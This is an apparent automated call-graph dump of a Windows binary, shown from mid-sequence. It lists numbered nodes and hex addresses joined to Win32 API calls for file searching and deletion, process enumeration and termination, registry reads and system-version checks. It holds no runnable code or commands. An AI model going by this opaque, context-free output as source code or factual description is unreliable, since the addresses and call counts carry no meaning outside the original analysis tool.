ef5fef 
98825->98827 98828 e8c92d 39 API calls 98826->98828 98829 e88e70 52 API calls 98827->98829 98830 ef5f15 98828->98830 98831 ef6001 98829->98831 98830->98822 98833 e8bf07 8 API calls 98830->98833 99184 eed836 98831->99184 98835 ef5f26 98833->98835 98834->98577 98836 e8bf07 8 API calls 98835->98836 98837 ef5f2f 98836->98837 98838 e88e70 52 API calls 98837->98838 98839 ef5f3c 98838->98839 98840 e8694e 8 API calls 98839->98840 98841 ef5f4f 98840->98841 98842 e87af4 8 API calls 98841->98842 98843 ef5f60 98842->98843 98850 ef5f89 98843->98850 99227 eedc8e 98843->99227 98845 e8c92d 39 API calls 98845->98822 98847 e8b25f 8 API calls 98848 ef5f80 98847->98848 99230 eeda81 98848->99230 98850->98845 98852 e8b3fe 8 API calls 98851->98852 98853 efde70 98852->98853 98854 ef183b 10 API calls 98853->98854 98855 efde78 98854->98855 98855->98577 99309 f088b6 98856->99309 98858 f09efa 98858->98577 98860 e8c92d 39 API calls 98859->98860 98861 e9f972 98860->98861 98862 e9f97a timeGetTime 98861->98862 98863 edfac0 Sleep 98861->98863 98864 e8c92d 39 API calls 98862->98864 98865 e9f990 98864->98865 98865->98577 98867 e8bf07 8 API calls 98866->98867 98868 ef8e4a 98867->98868 98869 ea019b 8 API calls 98868->98869 98870 ef8e54 98869->98870 98871 e841a6 8 API calls 98870->98871 98872 ef8e5e 98871->98872 98873 e88e70 52 API calls 98872->98873 98874 ef8e6d 98873->98874 98875 e8557e 9 API calls 98874->98875 98876 ef8e78 98875->98876 98877 e88e70 52 API calls 98876->98877 98878 ef8e85 98877->98878 98879 e88e70 52 API calls 98878->98879 98880 ef8e97 98879->98880 98881 e88e70 52 API calls 98880->98881 98882 ef8eac GetPrivateProfileStringW 98881->98882 98883 e86ab6 8 API calls 98882->98883 98884 ef8ecf ISource 98883->98884 98884->98577 98886 e8bf07 8 API calls 98885->98886 98887 ef9607 98886->98887 98888 e88e70 52 API calls 98887->98888 98889 ef9616 98888->98889 98890 e8557e 9 API calls 98889->98890 98891 ef9621 98890->98891 98892 e88e70 52 API calls 98891->98892 98893 ef962e 98892->98893 98894 
e88e70 52 API calls 98893->98894 98895 ef9640 98894->98895 98896 e88e70 52 API calls 98895->98896 98897 ef9655 WritePrivateProfileStringW 98896->98897 98898 ef966b WritePrivateProfileStringW 98897->98898 98899 ef9677 98897->98899 98898->98899 98899->98577 98901 e88e70 52 API calls 98900->98901 98902 f0ac65 98901->98902 99409 eedc9c CreateToolhelp32Snapshot Process32FirstW 98902->99409 98904 f0ac74 98904->98577 98906 e88e70 52 API calls 98905->98906 98907 ef4ae8 98906->98907 98908 eeda81 12 API calls 98907->98908 98909 ef4af0 98908->98909 98909->98577 98911 ef875a __wsopen_s 98910->98911 98912 e88e70 52 API calls 98911->98912 98913 ef877b 98912->98913 98914 e8c92d 39 API calls 98913->98914 98915 ef8799 98913->98915 98914->98915 98916 e88e70 52 API calls 98915->98916 98926 ef8973 98915->98926 98917 ef887c 98916->98917 98918 e8557e 9 API calls 98917->98918 98919 ef88a7 98918->98919 99427 ead913 98919->99427 98921 ef88cd 98922 ef88f7 GetCurrentDirectoryW SetCurrentDirectoryW 98921->98922 98923 ef8921 98922->98923 98922->98926 98924 eee387 4 API calls 98923->98924 98925 ef892a 98924->98925 98925->98926 98927 eee9c5 GetFileAttributesW 98925->98927 98926->98577 98928 ef8938 98927->98928 98929 ef8940 GetFileAttributesW SetFileAttributesW 98928->98929 98935 ef89cb 98928->98935 98930 ef8969 SetCurrentDirectoryW 98929->98930 98931 ef89b1 98929->98931 98930->98926 98932 ef89b5 SetCurrentDirectoryW 98931->98932 98933 ef8a02 SetCurrentDirectoryW 98931->98933 98932->98935 98933->98926 99430 ef9f9f FindFirstFileW 98935->99430 98936 ef89ea 98936->98933 98938 e88e70 52 API calls 98937->98938 98939 ef6d47 98938->98939 98940 ef6d84 98939->98940 98942 e8c92d 39 API calls 98939->98942 99474 eee783 98940->99474 98943 ef6d76 98942->98943 98943->98940 98945 e8557e 9 API calls 98943->98945 98944 ef6d92 98947 e87a59 8 API calls 98944->98947 98945->98940 98948 ef6dd7 98947->98948 98948->98577 98949 e88e70 52 API calls 98949->98944 98950->98585 98951->98542 98952->98545 98953->98568 
98954->98568 98955->98544 98956->98580 98957->98580 98958->98580 98959->98578 98960->98580 98961->98614 98962->98616 98963->98617 98964->98620 98966 e88e85 98965->98966 98982 e88e82 98965->98982 98967 e88e8d 98966->98967 98968 e88ebb 98966->98968 99030 ea5556 26 API calls 98967->99030 98970 e88ecd 98968->98970 98977 ec6a29 98968->98977 98978 ec6b10 98968->98978 99031 e9fe8f 51 API calls 98970->99031 98971 e88e9d 98976 ea016b 8 API calls 98971->98976 98974 ec6b28 98974->98974 98979 e88ea7 98976->98979 98981 ea019b 8 API calls 98977->98981 98987 ec6aa2 98977->98987 99033 ea5513 26 API calls 98978->99033 98980 e8b25f 8 API calls 98979->98980 98980->98982 98984 ec6a72 98981->98984 98988 f0d6b1 98982->98988 98983 ea016b 8 API calls 98985 ec6a99 98983->98985 98984->98983 98986 e8b25f 8 API calls 98985->98986 98986->98987 99032 e9fe8f 51 API calls 98987->99032 98989 e8bceb 8 API calls 98988->98989 98990 f0d6bf 98989->98990 98991 e8bceb 8 API calls 98990->98991 98992 f0d6c7 98991->98992 98993 e8bceb 8 API calls 98992->98993 98994 f0d6cf 98993->98994 98995 f0d737 98994->98995 98997 e8627c 8 API calls 98994->98997 98996 e8bceb 8 API calls 98995->98996 99000 f0d735 98996->99000 98998 f0d6e5 98997->98998 98998->98995 98999 e8627c 8 API calls 98998->98999 99001 f0d6f7 98999->99001 99003 e88685 8 API calls 99000->99003 99001->98995 99002 f0d6fc 99001->99002 99004 e896d9 8 API calls 99002->99004 99005 f0d760 99003->99005 99009 f0d707 99004->99009 99006 e88685 8 API calls 99005->99006 99007 f0d777 99006->99007 99008 e879ed 8 API calls 99007->99008 99012 f0d780 99008->99012 99010 e88685 8 API calls 99009->99010 99011 f0d728 99010->99011 99013 e896d9 8 API calls 99011->99013 99012->98631 99013->99000 99015 e8c269 8 API calls 99014->99015 99016 f0d30e CharUpperBuffW 99015->99016 99017 f0d329 99016->99017 99018 e8bf07 8 API calls 99017->99018 99019 f0d334 99018->99019 99020 e88685 8 API calls 99019->99020 99021 f0d347 _wcslen 99020->99021 99022 e879ed 8 API calls 99021->99022 99023 
f0d3a4 _wcslen 99021->99023 99022->99023 99023->98633 99025 e8c93e 99024->99025 99026 e8c945 99024->99026 99025->99026 99034 ea6661 39 API calls _strftime 99025->99034 99026->98687 99028 e8c988 99028->98687 99029->98701 99030->98971 99031->98971 99032->98978 99033->98974 99034->99028 99036 ef1852 99035->99036 99052 ef196b 99035->99052 99037 ef1872 99036->99037 99038 ef189f 99036->99038 99040 ef18b6 99036->99040 99037->99038 99041 ef1886 99037->99041 99039 ea019b 8 API calls 99038->99039 99046 ef1894 __fread_nolock 99039->99046 99043 ea019b 8 API calls 99040->99043 99050 ef18d3 99040->99050 99044 ea019b 8 API calls 99041->99044 99042 ef18fa 99045 ea019b 8 API calls 99042->99045 99043->99050 99044->99046 99047 ef1900 99045->99047 99048 ea016b 8 API calls 99046->99048 99054 e9c1f1 99047->99054 99048->99052 99050->99041 99050->99042 99050->99046 99052->98713 99055 ea019b 8 API calls 99054->99055 99056 e9c208 99055->99056 99057 ea016b 8 API calls 99056->99057 99058 e9c214 99057->99058 99059 e9f9e2 10 API calls 99058->99059 99059->99046 99061 e8bf07 8 API calls 99060->99061 99062 eedb88 99061->99062 99063 e8bf07 8 API calls 99062->99063 99064 eedb91 99063->99064 99065 e8bf07 8 API calls 99064->99065 99066 eedb9a 99065->99066 99067 e8557e 9 API calls 99066->99067 99068 eedba5 99067->99068 99069 eee9c5 GetFileAttributesW 99068->99069 99070 eedbae 99069->99070 99071 eedbc0 99070->99071 99072 e865a4 8 API calls 99070->99072 99073 e8694e 8 API calls 99071->99073 99072->99071 99074 eedbd4 FindFirstFileW 99073->99074 99075 eedbf3 99074->99075 99076 eedc60 FindClose 99074->99076 99075->99076 99077 eedc3b FindNextFileW 99075->99077 99079 e8be6d 8 API calls 99075->99079 99080 e87af4 8 API calls 99075->99080 99082 e865a4 8 API calls 99075->99082 99081 eedc6b 99076->99081 99077->99075 99078 eedc4f 99077->99078 99078->99075 99079->99075 99080->99075 99081->98718 99083 eedc2c DeleteFileW 99082->99083 99083->99077 99084 eedc57 FindClose 99083->99084 99084->99081 99086 ea019b 8 API 
calls 99085->99086 99087 e87a39 99086->99087 99088 ea016b 8 API calls 99087->99088 99089 e87a47 99088->99089 99089->98730 99091 e8bf07 8 API calls 99090->99091 99092 ee9b6d 99091->99092 99093 e87a14 8 API calls 99092->99093 99094 ee9b81 99093->99094 99095 ee96e3 41 API calls 99094->99095 99101 ee9ba3 99094->99101 99096 ee9b9d 99095->99096 99098 e88685 8 API calls 99096->99098 99096->99101 99098->99101 99099 e88685 8 API calls 99099->99101 99100 e87af4 8 API calls 99100->99101 99101->99099 99101->99100 99102 ee9c42 99101->99102 99105 ee9c26 99101->99105 99129 ee96e3 99101->99129 99103 e8be6d 8 API calls 99102->99103 99104 ee9c51 99102->99104 99103->99104 99104->98754 99106 e88685 8 API calls 99105->99106 99107 ee9c36 99106->99107 99108 e87af4 8 API calls 99107->99108 99108->99102 99110 ec587b 99109->99110 99111 e86ac6 99109->99111 99112 ec588c 99110->99112 99113 e884b7 8 API calls 99110->99113 99116 ea016b 8 API calls 99111->99116 99114 e8bceb 8 API calls 99112->99114 99113->99112 99115 ec5896 99114->99115 99115->99115 99117 e86ad9 99116->99117 99118 e86ae2 99117->99118 99119 e86af4 99117->99119 99121 e8b25f 8 API calls 99118->99121 99120 e8bf07 8 API calls 99119->99120 99122 e86aea 99120->99122 99121->99122 99122->98752 99124 e87a9e 99123->99124 99125 e87a65 99123->99125 99126 e8be6d 8 API calls 99124->99126 99128 e87a78 99124->99128 99127 ea016b 8 API calls 99125->99127 99126->99128 99127->99128 99128->98752 99130 ee9703 _wcslen 99129->99130 99131 ee97f7 99130->99131 99132 ee9738 99130->99132 99135 ee97f2 99130->99135 99134 e9e2e5 41 API calls 99131->99134 99131->99135 99133 e9e2e5 41 API calls 99132->99133 99132->99135 99133->99132 99134->99131 99135->99101 99137 eee3a5 GetFileAttributesW 99136->99137 99138 eee3cf 99136->99138 99137->99138 99139 eee3b1 FindFirstFileW 99137->99139 99138->98763 99139->99138 99140 eee3c2 FindClose 99139->99140 99140->99138 99142 e9c003 99141->99142 99144 e9bfc7 99141->99144 99143 e8bceb 8 API calls 99142->99143 99153 eed2ab 
99143->99153 99144->99142 99145 e9bfd6 99144->99145 99147 e9bfeb 99145->99147 99150 e9bff8 99145->99150 99146 eed2da 99146->98803 99161 e9c009 99147->99161 99149 eed249 2 API calls 99149->99153 99168 eed3b2 12 API calls 99150->99168 99151 e9bff4 99151->98803 99153->99146 99153->99149 99169 e8acc0 8 API calls __fread_nolock 99153->99169 99155->98812 99156->98815 99157->98819 99158->98772 99159->98772 99160->98810 99162 e9c1f1 8 API calls 99161->99162 99163 e9c021 99162->99163 99170 e8adc1 99163->99170 99166 e88774 10 API calls 99167 e9c03c 99166->99167 99167->99151 99168->99151 99169->99153 99176 e9feaa 99170->99176 99172 e8ae07 99172->99166 99172->99167 99173 e8b050 2 API calls 99174 e8add2 99173->99174 99174->99172 99174->99173 99183 e8b0e3 8 API calls __fread_nolock 99174->99183 99177 e9febb 99176->99177 99178 edfe13 99176->99178 99177->99174 99179 ea016b 8 API calls 99178->99179 99180 edfe1d 99179->99180 99181 ea019b 8 API calls 99180->99181 99182 edfe32 99181->99182 99183->99174 99185 e8bf07 8 API calls 99184->99185 99186 eed853 99185->99186 99187 e8bf07 8 API calls 99186->99187 99188 eed85b 99187->99188 99189 e8bf07 8 API calls 99188->99189 99190 eed863 99189->99190 99191 e8557e 9 API calls 99190->99191 99192 eed86d 99191->99192 99193 e8557e 9 API calls 99192->99193 99194 eed877 99193->99194 99242 eee958 99194->99242 99196 eed882 99197 eee9c5 GetFileAttributesW 99196->99197 99198 eed88d 99197->99198 99199 eed89f 99198->99199 99200 e865a4 8 API calls 99198->99200 99201 eee9c5 GetFileAttributesW 99199->99201 99200->99199 99202 eed8a7 99201->99202 99203 eed8b4 99202->99203 99205 e865a4 8 API calls 99202->99205 99204 e8bf07 8 API calls 99203->99204 99206 eed8bc 99204->99206 99205->99203 99207 e8bf07 8 API calls 99206->99207 99208 eed8c4 99207->99208 99209 e8694e 8 API calls 99208->99209 99210 eed8d5 FindFirstFileW 99209->99210 99211 eeda23 FindClose 99210->99211 99226 eed8f8 99210->99226 99216 eeda21 99211->99216 99212 eed9ef FindNextFileW 99212->99226 99213 
e8b25f 8 API calls 99213->99226 99215 e87af4 8 API calls 99215->99226 99216->98834 99217 e865a4 8 API calls 99217->99226 99218 eedc8e 4 API calls 99218->99226 99219 eed984 99222 e9e2e5 41 API calls 99219->99222 99223 eed9ad MoveFileW 99219->99223 99224 eed99d DeleteFileW 99219->99224 99220 eeda12 FindClose 99220->99216 99221 eeda5c CopyFileExW 99221->99226 99222->99219 99223->99226 99224->99226 99225 eed9ca DeleteFileW 99225->99226 99226->99211 99226->99212 99226->99213 99226->99215 99226->99217 99226->99218 99226->99219 99226->99220 99226->99221 99226->99225 99253 eedf85 99226->99253 99228 eee387 4 API calls 99227->99228 99229 eedc95 99228->99229 99229->98847 99229->98850 99231 e879ed 8 API calls 99230->99231 99232 eedab6 GetFileAttributesW 99231->99232 99233 eedae3 99232->99233 99234 eedaca GetLastError 99232->99234 99233->98850 99235 eedad7 CreateDirectoryW 99234->99235 99236 eedae5 99234->99236 99235->99233 99235->99236 99236->99233 99237 e896d9 8 API calls 99236->99237 99238 eedb27 99237->99238 99239 eeda81 8 API calls 99238->99239 99240 eedb30 99239->99240 99240->99233 99241 eedb34 CreateDirectoryW 99240->99241 99241->99233 99243 e8bf07 8 API calls 99242->99243 99244 eee96d 99243->99244 99245 e8bf07 8 API calls 99244->99245 99246 eee975 99245->99246 99247 e8694e 8 API calls 99246->99247 99248 eee984 99247->99248 99249 e8694e 8 API calls 99248->99249 99250 eee994 99249->99250 99251 e9e2e5 41 API calls 99250->99251 99252 eee9a9 99251->99252 99252->99196 99254 eedfa1 99253->99254 99255 eedfbc 99254->99255 99256 eedfa6 99254->99256 99257 e8bf07 8 API calls 99255->99257 99258 e8be6d 8 API calls 99256->99258 99306 eedfb7 99256->99306 99259 eedfc4 99257->99259 99258->99306 99260 e8bf07 8 API calls 99259->99260 99261 eedfcc 99260->99261 99262 e8bf07 8 API calls 99261->99262 99263 eedfd7 99262->99263 99264 e8bf07 8 API calls 99263->99264 99265 eedfdf 99264->99265 99266 e8bf07 8 API calls 99265->99266 99267 eedfe7 99266->99267 99268 e8bf07 8 API calls 99267->99268 
99269 eedfef 99268->99269 99270 e8bf07 8 API calls 99269->99270 99271 eedff7 99270->99271 99272 e8bf07 8 API calls 99271->99272 99273 eedfff 99272->99273 99274 e8694e 8 API calls 99273->99274 99275 eee016 99274->99275 99276 e8694e 8 API calls 99275->99276 99277 eee02f 99276->99277 99278 e8627c 8 API calls 99277->99278 99279 eee03b 99278->99279 99280 eee04e 99279->99280 99281 e896d9 8 API calls 99279->99281 99282 e8627c 8 API calls 99280->99282 99281->99280 99283 eee057 99282->99283 99284 eee067 99283->99284 99285 e896d9 8 API calls 99283->99285 99286 eee079 99284->99286 99287 e8be6d 8 API calls 99284->99287 99285->99284 99288 e87af4 8 API calls 99286->99288 99287->99286 99289 eee084 99288->99289 99307 eee141 8 API calls 99289->99307 99291 eee093 99308 eee141 8 API calls 99291->99308 99293 eee0a6 99294 e8627c 8 API calls 99293->99294 99295 eee0b0 99294->99295 99296 eee0c7 99295->99296 99297 eee0b5 99295->99297 99298 e8627c 8 API calls 99296->99298 99299 e865a4 8 API calls 99297->99299 99301 eee0d0 99298->99301 99300 eee0c2 99299->99300 99304 e87af4 8 API calls 99300->99304 99302 eee0ee 99301->99302 99303 e865a4 8 API calls 99301->99303 99305 e87af4 8 API calls 99302->99305 99303->99300 99304->99302 99305->99306 99306->99226 99307->99291 99308->99293 99310 e88e70 52 API calls 99309->99310 99311 f088ed 99310->99311 99332 f08932 ISource 99311->99332 99347 f09632 99311->99347 99313 f08bde 99314 f08dac 99313->99314 99319 f08bec 99313->99319 99403 f09843 59 API calls 99314->99403 99317 f08dbb 99318 f08dc7 99317->99318 99317->99319 99318->99332 99360 f087e3 99319->99360 99320 e88e70 52 API calls 99337 f089a6 99320->99337 99325 f08c25 99374 ea0000 99325->99374 99328 f08c45 99402 ef3ef6 81 API calls __wsopen_s 99328->99402 99329 f08c5f 99331 e87d51 8 API calls 99329->99331 99334 f08c6e 99331->99334 99332->98858 99333 f08c50 GetCurrentProcess TerminateProcess 99333->99329 99335 e883b0 8 API calls 99334->99335 99336 f08c87 99335->99336 99338 e91c50 8 API calls 99336->99338 
99344 f08caf 99336->99344 99337->99313 99337->99320 99337->99332 99400 ee4a0c 8 API calls __fread_nolock 99337->99400 99401 f08e7c 41 API calls _strftime 99337->99401 99340 f08c9e 99338->99340 99339 f08e22 99339->99332 99341 f08e36 FreeLibrary 99339->99341 99342 f094da 74 API calls 99340->99342 99341->99332 99342->99344 99344->99339 99346 e8b3fe 8 API calls 99344->99346 99378 e91c50 99344->99378 99389 f094da 99344->99389 99346->99344 99348 e8c269 8 API calls 99347->99348 99349 f0964d CharLowerBuffW 99348->99349 99350 ee96e3 41 API calls 99349->99350 99351 f0966e 99350->99351 99353 e8bf07 8 API calls 99351->99353 99359 f096a7 _wcslen 99351->99359 99354 f09689 99353->99354 99355 e88685 8 API calls 99354->99355 99356 f0969d 99355->99356 99357 e896d9 8 API calls 99356->99357 99357->99359 99358 f097bd _wcslen 99358->99337 99359->99358 99404 f08e7c 41 API calls _strftime 99359->99404 99361 f087fe 99360->99361 99365 f08849 99360->99365 99362 ea019b 8 API calls 99361->99362 99364 f08820 99362->99364 99363 ea016b 8 API calls 99363->99364 99364->99363 99364->99365 99366 f099f5 99365->99366 99367 f09c0a ISource 99366->99367 99372 f09a19 _strcat _wcslen ___std_exception_copy 99366->99372 99367->99325 99368 e8c92d 39 API calls 99368->99372 99369 e8c5df 39 API calls 99369->99372 99370 e8c9fb 39 API calls 99370->99372 99371 e88e70 52 API calls 99371->99372 99372->99367 99372->99368 99372->99369 99372->99370 99372->99371 99405 eef7da 10 API calls _wcslen 99372->99405 99375 ea0015 99374->99375 99376 ea00ad TerminateProcess 99375->99376 99377 ea007b 99375->99377 99376->99377 99377->99328 99377->99329 99379 e91c62 99378->99379 99381 e91c6b 99379->99381 99406 e9b71c 8 API calls 99379->99406 99382 e91d20 99381->99382 99383 ea016b 8 API calls 99381->99383 99382->99344 99384 e91d89 99383->99384 99385 ea016b 8 API calls 99384->99385 99386 e91d92 99385->99386 99387 e8b25f 8 API calls 99386->99387 99388 e91da1 99387->99388 99388->99344 99390 f094f2 99389->99390 99391 f0950e 99389->99391 
99390->99391 99392 f095c3 99390->99392 99393 f094f9 99390->99393 99394 f0951a 99390->99394 99391->99344 99408 ef15b3 72 API calls ISource 99392->99408 99407 eef3fd 10 API calls _strlen 99393->99407 99395 e86ab6 8 API calls 99394->99395 99395->99391 99398 f09503 99399 e86ab6 8 API calls 99398->99399 99399->99391 99400->99337 99401->99337 99402->99333 99403->99317 99404->99358 99405->99372 99406->99381 99407->99398 99408->99391 99419 eee723 99409->99419 99411 eedd9b CloseHandle 99411->98904 99412 eedce9 Process32NextW 99412->99411 99418 eedce2 99412->99418 99413 e8bf07 8 API calls 99413->99418 99414 e8b25f 8 API calls 99414->99418 99415 e8694e 8 API calls 99415->99418 99416 e87af4 8 API calls 99416->99418 99417 e9e2e5 41 API calls 99417->99418 99418->99411 99418->99412 99418->99413 99418->99414 99418->99415 99418->99416 99418->99417 99420 eee72e 99419->99420 99421 eee745 99420->99421 99424 eee74b 99420->99424 99425 ea6742 GetStringTypeW _strftime 99420->99425 99426 ea668b 39 API calls _strftime 99421->99426 99424->99418 99425->99420 99426->99424 99444 ead6be 99427->99444 99431 efa03a FindClose 99430->99431 99434 ef9fc9 99430->99434 99432 efa04b FindFirstFileW 99431->99432 99433 efa0e2 99431->99433 99440 efa060 99432->99440 99442 efa0d9 FindClose 99432->99442 99433->98936 99436 efa028 FindNextFileW 99434->99436 99438 ef9ff7 GetFileAttributesW SetFileAttributesW 99434->99438 99436->99431 99436->99434 99437 efa0c7 FindNextFileW 99437->99440 99437->99442 99438->99434 99439 efa0eb FindClose 99438->99439 99439->99433 99440->99437 99441 efa0a0 SetCurrentDirectoryW 99440->99441 99440->99442 99443 efa0c0 SetCurrentDirectoryW 99440->99443 99441->99440 99442->99433 99443->99437 99445 ead89f 99444->99445 99446 ead6d5 99444->99446 99472 eaf669 20 API calls _free 99445->99472 99446->99445 99450 ead740 99446->99450 99448 ead8af 99473 eb2b7c 26 API calls __wsopen_s 99448->99473 99451 ead764 99450->99451 99454 ead78b 99450->99454 99467 eb5153 26 API calls 2 library calls 99450->99467 
99466 eaf669 20 API calls _free 99451->99466 99453 ead868 99453->99451 99456 ead87b 99453->99456 99459 ead774 99453->99459 99454->99451 99461 ead7fd 99454->99461 99468 eb5153 26 API calls 2 library calls 99454->99468 99471 eb5153 26 API calls 2 library calls 99456->99471 99457 ead820 99457->99451 99458 ead841 99457->99458 99469 eb5153 26 API calls 2 library calls 99457->99469 99458->99451 99458->99459 99463 ead857 99458->99463 99459->98921 99461->99453 99461->99457 99470 eb5153 26 API calls 2 library calls 99463->99470 99466->99459 99467->99454 99468->99461 99469->99458 99470->99459 99471->99459 99472->99448 99473->99459 99475 ec22f0 __wsopen_s 99474->99475 99476 eee790 GetShortPathNameW 99475->99476 99477 e884b7 8 API calls 99476->99477 99478 eee7b8 99477->99478 99478->98944 99478->98949 99479 e915af 99486 e9e34f 99479->99486 99481 e915c5 99495 e9e3b3 99481->99495 99483 e915ef 99484 ed61ab 99483->99484 99507 ef3ef6 81 API calls __wsopen_s 99483->99507 99487 e9e35d 99486->99487 99488 e9e370 99486->99488 99489 e8b3fe 8 API calls 99487->99489 99490 e9e3a3 99488->99490 99491 e9e375 99488->99491 99494 e9e367 99489->99494 99493 e8b3fe 8 API calls 99490->99493 99492 ea016b 8 API calls 99491->99492 99492->99494 99493->99494 99494->99481 99496 e87a14 8 API calls 99495->99496 99497 e9e3ea 99496->99497 99498 e8b25f 8 API calls 99497->99498 99500 e9e41b 99497->99500 99499 ede4e4 99498->99499 99501 e87af4 8 API calls 99499->99501 99500->99483 99502 ede4ef 99501->99502 99508 e9e73b 39 API calls 99502->99508 99504 ede502 99505 e8b3fe 8 API calls 99504->99505 99506 ede506 99504->99506 99505->99506 99506->99506 99507->99484 99508->99504 99509 e81044 99514 e82735 99509->99514 99511 e8104a 99550 ea0433 29 API calls __onexit 99511->99550 99513 e81054 99551 e829da 99514->99551 99518 e827ac 99519 e8bf07 8 API calls 99518->99519 99520 e827b6 99519->99520 99521 e8bf07 8 API calls 99520->99521 99522 e827c0 99521->99522 99523 e8bf07 8 API calls 99522->99523 99524 e827ca 99523->99524 99525 
e8bf07 8 API calls 99524->99525 99526 e82808 99525->99526 99527 e8bf07 8 API calls 99526->99527 99528 e828d4 99527->99528 99561 e82d5e 99528->99561 99532 e82906 99533 e8bf07 8 API calls 99532->99533 99534 e82910 99533->99534 99535 e930e0 9 API calls 99534->99535 99536 e8293b 99535->99536 99582 e830ed 99536->99582 99538 e82957 99539 e82967 GetStdHandle 99538->99539 99540 e829bc 99539->99540 99541 ec39c1 99539->99541 99545 e829c9 OleInitialize 99540->99545 99541->99540 99542 ec39ca 99541->99542 99543 ea016b 8 API calls 99542->99543 99544 ec39d1 99543->99544 99589 ef09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99544->99589 99545->99511 99547 ec39da 99590 ef1200 CreateThread 99547->99590 99549 ec39e6 CloseHandle 99549->99540 99550->99513 99591 e82a33 99551->99591 99554 e82a33 8 API calls 99555 e82a12 99554->99555 99556 e8bf07 8 API calls 99555->99556 99557 e82a1e 99556->99557 99558 e884b7 8 API calls 99557->99558 99559 e8276b 99558->99559 99560 e83205 6 API calls 99559->99560 99560->99518 99562 e8bf07 8 API calls 99561->99562 99563 e82d6e 99562->99563 99564 e8bf07 8 API calls 99563->99564 99565 e82d76 99564->99565 99566 e8bf07 8 API calls 99565->99566 99567 e82d91 99566->99567 99568 ea016b 8 API calls 99567->99568 99569 e828de 99568->99569 99570 e8318c 99569->99570 99571 e8319a 99570->99571 99572 e8bf07 8 API calls 99571->99572 99573 e831a5 99572->99573 99574 e8bf07 8 API calls 99573->99574 99575 e831b0 99574->99575 99576 e8bf07 8 API calls 99575->99576 99577 e831bb 99576->99577 99578 e8bf07 8 API calls 99577->99578 99579 e831c6 99578->99579 99580 ea016b 8 API calls 99579->99580 99581 e831d8 RegisterWindowMessageW 99580->99581 99581->99532 99583 ec3c69 99582->99583 99584 e830fd 99582->99584 99598 ef3b63 8 API calls 99583->99598 99585 ea016b 8 API calls 99584->99585 99587 e83105 99585->99587 99587->99538 99588 ec3c74 99589->99547 99590->99549 99599 ef11e6 14 API calls 99590->99599 99592 e8bf07 8 API 
calls 99591->99592 99593 e82a3e 99592->99593 99594 e8bf07 8 API calls 99593->99594 99595 e82a46 99594->99595 99596 e8bf07 8 API calls 99595->99596 99597 e82a08 99596->99597 99597->99554 99598->99588 99600 ec27a2 99603 e82a52 99600->99603 99604 ec39f4 DestroyWindow 99603->99604 99605 e82a91 mciSendStringW 99603->99605 99617 ec3a00 99604->99617 99606 e82d08 99605->99606 99607 e82aad 99605->99607 99606->99607 99609 e82d17 UnregisterHotKey 99606->99609 99608 e82abb 99607->99608 99607->99617 99635 e82e70 99608->99635 99609->99606 99611 ec3a45 99616 ec3a58 FreeLibrary 99611->99616 99618 ec3a69 99611->99618 99612 ec3a1e FindClose 99612->99617 99614 e87953 CloseHandle 99614->99617 99615 e82ad0 99615->99618 99622 e82ade 99615->99622 99616->99611 99617->99611 99617->99612 99617->99614 99619 ec3a7d VirtualFree 99618->99619 99624 e82b4b 99618->99624 99619->99618 99620 e82b3a CoUninitialize 99620->99624 99621 ec3ac5 99627 ec3ad4 ISource 99621->99627 99641 ef3c45 6 API calls ISource 99621->99641 99622->99620 99624->99621 99625 e82b56 99624->99625 99639 e82f86 VirtualFreeEx CloseHandle 99625->99639 99631 ec3b63 99627->99631 99642 ee6d63 8 API calls ISource 99627->99642 99629 e82b7c 99629->99627 99630 e82c61 99629->99630 99630->99631 99632 e82caf 99630->99632 99631->99631 99632->99631 99640 e82eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 99632->99640 99634 e82d03 99636 e82e7d 99635->99636 99637 e82ac2 99636->99637 99643 ee78b9 8 API calls 99636->99643 99637->99611 99637->99615 99639->99629 99640->99634 99641->99621 99642->99627 99643->99636 99644 ede6dd 99646 ede68a 99644->99646 99647 eee753 SHGetFolderPathW 99646->99647 99648 e884b7 8 API calls 99647->99648 99649 eee780 99648->99649 99649->99646 99650 e81098 99655 e85d78 99650->99655 99654 e810a7 99656 e8bf07 8 API calls 99655->99656 99657 e85d8f GetVersionExW 99656->99657 99658 e884b7 8 API calls 99657->99658 99659 e85ddc 99658->99659 99660 e896d9 8 API calls 99659->99660 99674 e85e12 99659->99674 
99661 e85e06 99660->99661 99663 e879ed 8 API calls 99661->99663 99662 e85ecc GetCurrentProcess IsWow64Process 99664 e85ee8 99662->99664 99663->99674 99665 e85f00 LoadLibraryA 99664->99665 99666 ec50f2 GetSystemInfo 99664->99666 99667 e85f4d GetSystemInfo 99665->99667 99668 e85f11 GetProcAddress 99665->99668 99670 e85f27 99667->99670 99668->99667 99669 e85f21 GetNativeSystemInfo 99668->99669 99669->99670 99672 e85f2b FreeLibrary 99670->99672 99673 e8109d 99670->99673 99671 ec50ad 99672->99673 99675 ea0433 29 API calls __onexit 99673->99675 99674->99662 99674->99671 99675->99654 99676 e8105b 99681 e8522e 99676->99681 99678 e8106a 99712 ea0433 29 API calls __onexit 99678->99712 99680 e81074 99682 e8523e __wsopen_s 99681->99682 99683 e8bf07 8 API calls 99682->99683 99684 e852f4 99683->99684 99685 e8551b 10 API calls 99684->99685 99686 e852fd 99685->99686 99713 e851bf 99686->99713 99689 e865a4 8 API calls 99690 e85316 99689->99690 99691 e8684e 8 API calls 99690->99691 99692 e85325 99691->99692 99693 e8bf07 8 API calls 99692->99693 99694 e8532e 99693->99694 99695 e8bceb 8 API calls 99694->99695 99696 e85337 RegOpenKeyExW 99695->99696 99697 ec4bc0 RegQueryValueExW 99696->99697 99701 e85359 99696->99701 99698 ec4bdd 99697->99698 99699 ec4c56 RegCloseKey 99697->99699 99700 ea019b 8 API calls 99698->99700 99699->99701 99711 ec4c68 _wcslen 99699->99711 99702 ec4bf6 99700->99702 99701->99678 99703 e841a6 8 API calls 99702->99703 99704 ec4c01 RegQueryValueExW 99703->99704 99705 ec4c1e 99704->99705 99708 ec4c38 ISource 99704->99708 99706 e884b7 8 API calls 99705->99706 99706->99708 99707 e8627c 8 API calls 99707->99711 99708->99699 99709 e8b25f 8 API calls 99709->99711 99710 e8684e 8 API calls 99710->99711 99711->99701 99711->99707 99711->99709 99711->99710 99712->99680 99714 ec22f0 __wsopen_s 99713->99714 99715 e851cc GetFullPathNameW 99714->99715 99716 e851ee 99715->99716 99717 e884b7 8 API calls 99716->99717 99718 e8520c 99717->99718 99718->99689 99719 e8367c 99722 e83696 
